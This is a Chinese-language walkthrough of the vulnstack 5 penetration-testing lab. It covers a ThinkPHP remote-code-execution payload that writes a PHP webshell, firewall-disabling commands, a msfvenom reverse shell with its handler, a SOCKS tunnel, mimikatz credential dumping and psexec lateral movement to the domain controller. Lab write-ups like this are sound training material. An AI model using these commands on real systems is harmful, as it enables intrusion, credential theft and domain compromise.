vulnstack——5

一 环境搭建

1、项目地址

http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

2、网络配置信息

1.VMware新建网卡VMnet6，选择仅主机模式，并将网段IP设置为192.168.138.0

2.Win7设置双网卡，一个网卡选择VMnet6、另一个NAT

 模拟外网IP：192.168.10.128（在Win7主机开启IP自动获取）

 内网IP：192.168.138.136

 账号密码：sunheart 123.com 和 sunAdministrator dc123.com

3.Windows 2008 连接VMnet6

 内网IP：192.168.138.138

 sunadmin 2020.com

4、开启web环境

二 外网渗透

1、端口扫描

nmap -T4 -sC -sV 192.168.10.128

2、访问80端口

#尝试页面报错，获取thinkphp具体版本
http://192.168.10.128/?s=1

3、搜索thinkphp

searchsploit thinkphp

4、查看46150.txt

cd /usr/share/exploitdb/exploits/php/webapps
cat 46150.txt

5、直接使用文件内的payload进行攻击，whoami试一下

执行成功

6、写入一句话木马

#写入webshell的命令
echo "<?php @eval($_POST[cmd]);?>" > 66.php

http://192.168.10.128/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval($_POST[cmd]);?>" > 66.php

写入成功

查看文件

http://192.168.10.128/?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=dir

7、蚁剑进行连接

三、信息收集

1、查看ip发现有两个网卡一个内网一个外网

2、whoami查看权限发现是管理员权限

3、执行net config workstation发现域名叫sun.com

3.1域内信息收集

1、查看域内用户

net user /domain

2、查询域内主机

net group "domain computers" /domain

3、查看域控制器

net group "domain controllers" /domain

4、查看域管理员

net group "domain admins" /domai

5、域控制器的名字叫DC，域名叫sun.com，拼接起来直接ping域名

ping DC.sun.com

四、横向移动

4.1 路由转发和代理通道

1、在蚁剑里先关闭他的防火墙

netsh advfirewall set domainprofile state off#关闭域防火墙
netsh advfirewall set privateprofile state off#关闭四方防火墙
netsh advfirewall set publicprofile state off#关闭公网防火墙
netsh firewall show state#查看防火墙状态

2、生成一个木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.64.129 LPORT=6060 -f exe > chuid.exe

3、用蚁剑上传上去

4、设置监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.129
set lport 6060
run

执行exe文件

5、添加路由

在msfconsole里面添加一个通向192.168.138.0网段的路由

route add 192.168.138.0 255.255.255.0 1
route print

6、搭建代理隧道

攻击端上传ew_for_linux64并执行如下命令：

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

Win7上传ew_for_Win.exe并执行如下命令：

ew_for_win.exe -s rssocks -d 192.168.10.129 -e 1234

7.配置proxychain

将socks5服务器指向127.0.0.1:1080，便可以使用proxychains将我们的程序代理进内网。

4.1抓取域用户密码

1.使用wiki模块抓取密码

2、进程迁移

ps

# 通过进程id，选择一个64为进程进行迁移
migrate pid

3、密码抓取

kiwi_cmd privilege::debug
kiwi_cmd sekurlsa::logonPasswords

抓到administrator的密码是dc123.com

4.3 使用Psexec登录域控

1、使用exploit/windows/smb/psexec模块

use exploit/windows/smb/psexec
set rhosts 192.168.138.138
set SMBDomain SUN
set SMBUser administrato
set SMBPass dc123.com
set payload windows/meterpreter/bind_tcp
run

2.远程关闭域控防火墙
sessions创建失败，可能是由于防火墙导致，远程关闭。

net use \192.168.138.138ipc$ "dc123.com" /user:"administrator"

利用sc创建服务来远程关闭Windows 2008的防火墙

#创建服务
sc \192.168.138.138 create unablefirewall binpath= "netsh advfirewall set allprofiles state off"
#启动服务
sc \192.168.138.138 start unablefirewall

3.使用exploit/windows/smb/psexec模块

至此拿下域控

原文始发于微信公众号（揽月安全团队）：vulnstack——5